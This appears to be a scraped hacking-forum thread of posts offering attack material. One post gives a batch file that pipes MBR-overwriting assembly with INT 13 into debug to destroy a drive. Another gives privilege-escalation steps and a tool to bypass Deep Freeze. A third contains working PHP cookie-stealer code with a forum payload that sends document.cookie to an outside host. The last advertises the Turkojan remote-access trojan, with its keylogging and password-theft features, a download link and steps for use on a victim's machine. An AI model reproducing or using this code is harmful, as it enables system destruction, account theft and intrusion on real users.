    -w 7c00
    Writing 00200 bytes
    -q

    This is because under macrosoft windows NEVER we take for confidence our tasks to

    dispatcher and the background subsystem administrator

    I here where we start made the "dump" for our mydoom exe code:

    If AX and CX are how the previous table our file don't pass for a datalink and is not

    administred for a cryptography server and is there where we say: "is clear"

    we pass througth the dissasemble task:

    C:> debug mydoom.exe

    - d

    mydoom.exe

    C:>debug mydoom
    ???? ?? ??????
    -d
    13AD:0100 4D 00 00 41 00 00 00 00-00 00 00 00 00 00 00 00 M..A............
    13AD:0110 43 4F 4D 53 50 45 43 3D-43 3A 5C 57 34 00 9C 13 COMSPEC=C:W4...
    13AD:0120 57 53 5C 53 59 53 54 45-4D 33 32 5C 43 4F 4D 4D WSSYSTEM32COMM
    13AD:0130 41 4E 44 2E 43 4F 4D 00-41 4C 4C 55 53 45 52 53 AND.COM.ALLUSERS
    13AD:0140 50 52 4F 46 49 4C 45 3D-43 3A 5C 44 4F 43 55 4D PROFILE=C:DOCUM
    13AD:0150 45 7E 31 5C 41 4C 4C 55-53 45 7E 31 00 41 50 50 E~1ALLUSE~1.APP
    13AD:0160 44 41 54 41 3D 43 3A 5C-44 4F 43 55 4D 45 7E 31 DATA=C:DOCUME~1
    13AD:0170 5C 61 7A 72 61 65 6C 5C-41 50 50 4C 49 43 7E 31 azraelAPPLIC~1
    -d
    13AD:0180 00 43 4C 49 45 4E 54 4E-41 4D 45 3D 43 6F 6E 73 .CLIENTNAME=Cons
    13AD:0190 6F 6C 65 00 43 4F 4D 4D-4F 4E 50 52 4F 47 52 41 ole.COMMONPROGRA
    13AD:01A0 4D 46 49 4C 45 53 3D 43-3A 5C 50 52 4F 47 52 41 MFILES=C:PROGRA
    13AD:01B0 7E 31 5C 43 4F 4D 4D 4F-4E 7E 31 00 43 4F 4D 50 ~1COMMON~1.COMP
    13AD:01C0 55 54 45 52 4E 41 4D 45-3D 49 52 45 4E 49 43 56 UTERNAME=IRENICV
    13AD:01D0 53 00 48 4F 4D 45 44 52-49 56 45 3D 43 3A 00 48 S.HOMEDRIVE=C:.H
    13AD:01E0 4F 4D 45 50 41 54 48 3D-5C 00 49 4E 43 4C 55 44 OMEPATH=.INCLUD
    13AD:01F0 45 3D 44 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C E=D:Program Fil
    -

    We obtain a 1024 block each time we pusk a keyboard key (1024 or 256)

    Now if we need crash the system, its simple, perform a "useless" batch file:

    @echo off
    echo >$ n sco.com
    echo >$ a 1024
    echo >>$ XOR AX,AX ; exit to zero code and SS
    echo >>$ MOV SS,AX ; SS prepared on AX
    echo >>$ MOV SP,7C00 ; place the pointer to 0000:7C00
    echo >>$ STI ; enbable interrupts
    echo >>$ PUSH AX ; (AX=0)
    echo >>$ POP ES ; Cloack! Cloack! to extra pointer
    echo >>$ PUSH AX ; (AX=0) tester AGaINN
    echo >>$ POP DS ; Segments to zero code
    echo >>$ CLD ; we must erase the address!!
    echo >>$ MOV SI,7C1B ; where we go
    echo >>$ MOV DI,061B ; al offset destination Fuck more BytES
    echo >>$ PUSH AX ; (AX) y (DI) in offset
    echo >>$ PUSH DI ; this is dedicated to macrosoft 0000:061B
    echo >>$ MOV CX,FFFFF ; address and DI undocummented
    echo >>$ MOV BP,07BE ; first entry for BP BT BS
    echo >>$ MOV CL,04 ; four ways extra
    echo >>$ CMP [BP+00],CH ; CH to 0
    echo >>$ JL 062E ; find the posibly mbr sector
    echo >>$ JNZ 063A ; xD "Invalid partition table"
    echo >>$ ADD BP,+10 ;
    echo >>$ LOOP 0620 ;
    echo >>$ REP ; FuckinG AGaINN CX TimES
    echo >>$ MOVSB ; pop-pop-delta bytE per bytE
    echo >>$ RETF ; RETF to jump
    echo >>$ INT 13 ; For FucKing FormaT drive fuckinG
    echo >>$ w
    echo >>$ q
    debug <$ >nul
    del $

    this example show how no need a useless tool, only we mind.

    THX 2 to AzRaEL

    [NuKE] high council

    www.crackenfind.net

  11. A black-hat computer programmer in Argentina with a grudge against Faronics, Emiliano Scavuzzo, has written a program to thaw Deep Freeze without knowing the password. It works on almost ALL versions of Deep Freeze, including the latest version, v5.60.120.1347, which recently came out (Oct-20-2005) to supposedly be immune to his program�it's not! You can use Deep Unfreezer to test for the vulnerability on your own machines:

    Deep Freeze Unfreezer
    [url]http://usuarios.arnet.com.ar/fliamarconato/pages/edeepunfreezer.html[/url]

    Method 1:

    To perform the test you must first acquire DebugPrivileges (removed by Deep Freeze) by escalating to NT_AUTHORITY (the System account) using Task Scheduler from the command line:

    1) at 11:23pm /interactive taskmgr.exe (add one or two minutes to the current time)
    2) End Task explorer.exe
    3) File / New Task (Run...) explorer.exe to launch the explorer shell under the System account which has Debug Privileges
    4) Run Deep Unfreezer from the System account.

    Method 2:

    OR, use ntrights.exe from the Windows Server 2003 Resource Kit, a free download, [url]http://tinyurl.com/6p6cy[/url], to grant yourself the SeDebugPrivilege.
    Syntax: ntrights -u Users +r SeDebugPrivilege
    If you use ntrights, you must logoff and logon again for the privilege to take effect.

    Then run Deep Unfreezer, View Status, click on the Boot Thawed button, Save Status, and restart the machine. If the machine reboots in thawed mode, your version of Deep Freeze is vulnerable, and you should take measures to provide additional security on your machines.

    Deep Freeze Evaluation versions are also vulnerable to this attack. Deep Freeze Evaluation versions can be taken off machines by an attacker by forwarding the system date past 60-days which will expire Deep Freeze, causing the computer to restart in thawed mode, allowing Deep Freeze to be uninstalled. If you're using an evaluation version of Deep Freeze, here's how to perform this test:

    Method 1:

    1) Switch to the System account, as described above
    2) Double-click the time in the system tray
    3) Forward the date past 60-days
    4) Restart in thawed mode
    5) Use DeepFreezeSTDEval.exe to uninstall Deep Freeze. Deep Freeze is not uninstalled through Add/Remove Programs. It is uninstalled with the installation file, and ONLY with the installation file. Yes, the same file is used to install and uninstall. If you don't have it, download it here. It's a free download:

    Deep Freeze Evaluation -Trial Version - v5.60.120.1347
    [url]http://www.faronics.com/exe/DeepFreezeSTDEval.exe[/url]

    Method 2:

    Or, use ntrights.exe from the Windows Server 2003 Resource Kit to grant yourself the SeSystemtimePrivilege.
    Syntax: ntrights -u Users +r SeSystemtimePrivilege
    You must logoff and logon again for the new privilege to take effect.

    Special Note:

    Faronics came out with v5.60.120.1347 on 10-20-2005 as a response to Deep Unfreezer. It proved to be an impotent move. Emiliano's response to the new version? "rename frzstate2k.exe to anything else. Then attach to DF5Serve.exe instead". Does that work? Yes, it does. Thus, the newest version of Deep Freeze, intended to thwart Deep Unfreezer, continues to be vulnerable.

    Deep Freeze protects over four million computers world-wide and over one million Macs (yes, there's a Deep Freeze for Mac). And most Deep Freeze installations around the world are vulnerable to this attack (but not the Macs). At this time Faronics does not have a fix, nor an immune version. If you are a network administrator in charge of maintaining a network of machines protected by Deep Freeze, please be advised of this situation and be prepared.

    One of the main issues is the fact that so many computers these days allow Administrator status. Even a lot of internet cafes use Windows XP Home edition, with the user logged in as Administrator. The developers at Faronics are committed, however, to protecting the machine even from Administrators! The problem with that is, as you know, whatever is taken away from an Administrator, the Administrator can give back to himself. So if, for example, Deep Freeze removes DebugPrivilges, users can simply grant it back to themselves.

    Another issue is their commitment to non-restrictive use. Their commitment with Deep Freeze is to protect the machine non-restrictively. That has worked... until now. I think they may be forced at this point to admit Administrator accounts can't be guaranteed protection any longer. Unless they can secure these issues, I don't see any other way.

  12. Creat a file log.php and insert the code:

    <?php

    /* S4aLog v1.0 [ Beta ]

    -----------------------

    **Beta Of S4aLog v1.0 With Str_Repalce <;>

    ! You Can Get Cookies And Refresh The Broweser ! v0.10

    [ New New New ]

    !Named Your Attack With $nm e.x [url]http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies[/url]
    [ MSG ]

    Name : Attack1

    Cookies : Cookies

    Refresh : [url]http://www.s4a.xx[/url]
    [ MSG ]!

    !

    Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;

    !

    [ New New New ]

    */

    $YourMail = "devil-00@hotmail.co.uk"; // Your E-mail

    /*-----------------------*/

    $Ip = $REMOTE_ADDR;

    $Cooki_e = $_GET['id'];

    $NameOfAttack = $_GET['nm'];

    $Refresh = $_GET['re'];

    /* Start */

    $ReplaceCookie1 = array("=",";");

    $ReplaceCookie2 = array("[ "," ] ");

    $Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace

    /* e.x hash=0210; | hash[0210]*/

    //***************************************//

    $Hdr = "From: S4aLog <log-v1@s4a.cc>";

    $Msg =

    "

    Mr Attacker ,,, S4aLog v1 Beta <<

    [ ".$NameOfAttack." ] ,, Name Of Attack

    [ ".$Refresh." ] ,, Refresh Page

    [ ".$Ip." ] ,, Ip

    [ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]

    [ [mail]devil-00@hotmail.co.uk[/mail] - [mail]devil.00@gmail.com[/mail] ]

    -----------------------------------------------

    Cookie ::

    ".$Cooki_e."

    ";

    /* ------------------------------------------------------------------------- */

    $Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);

    /************************************************** ***************************/

    if($Send){

    if($Refresh <> ""){header("location:".$Refresh);}

    }

    ?>

    And in the forum copy this code in your message:

    [flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash]

  13. Turkojan 3.0 Properties

    -------------------------

    +Reverse Connection

    +Remote passwords

    +Chat with server

    +Send fake messages

    +Advanced file manager

    +Zipping files&folders

    +Find files

    +Change remote screen resolution

    +Print text to remote screen

    +Mouse manager

    +Information about remote computer

    +Clipboard managet

    +Set remote date/time

    +IE options

    +Running Process

    +Service Manager

    +Keyboard Manager

    +Sending Keys

    +Online keylogger

    +Offline keylogger

    +Fun Menu

    +Print Text

    +Change Windows Colors

    +Registry manager

    +Take screenshot

    +Take photo from webcam

    +Invisible in Netstat/Searching Files/Regedit/Msconfig

    -----------------------------------------------------

    Remote passwords

    -----------------------

    Turkojan can get remote passwords via advanced password manager.

    Turkojan can get this programs' passwords :

    -------------------------------------------

    +ICQ 99/2003/Lite

    +MSN Messenger 6.x / 7.x Passwords

    +Windows Messenger Passwords

    +Yahoo Messenger 5.x / 6.x Passwords

    +Miranda-IM Passwords

    +Trillian Passwords

    +&RQ Passwords

    +The Bat! Passwords

    +AOL IM ?Passwords

    +Windows & Total Commander Passwords

    +GAIM Passwords

    +Becky Passwords

    +Cute FTP Passwords

    +E-Dialer Passwords

    +FAR Manager Passwords

    +WS_FTP Passwords

    +Other Ftp Passwords

    +IE Passwords

    +Mozilla Passwords

    +Firefox Passwords

    +Opera Passwords

    +Outlook Passwords

    +Opera Mail Passwords

    +RAS (Dial-up) Passwords

    +Cached Passwords

    Also Turkojan can get these passwords via its special plugin :

    --------------------------------------------------------------

    +Outlook Express Passwords

    +Microsoft Outlook 2000 Passwords

    +Microsoft Outlook 2002/2003 Passwords

    +IncrediMail Passwords

    +Eudora Passwords

    +Netscape 6.x/7.x Passwords

    +Mozilla Thunderbird Passwords

    +Group Mail Free Passwords

    +Yahoo! Mail Passwords

    +Hotmail/MSN Mail Passwords

    +Gmail Passwords

    +IE/FTP Passwords

    To get remote passwords via plugin;you must upload plugin.exe(which comes with Turkojan 3.0) to victim's computer and you must

    execute it.After that passwords.txt will be created in the same directory.Now ou can download and get passwords.

    You must forward these ports : 15963,5742,5743,5744,5745

    Download:

    http://www.turkojan.com/download.php?file=Turkojaneng3.zip

    Am NOD32 si nu-l poate sterge din PC.

×
×
  • Create New...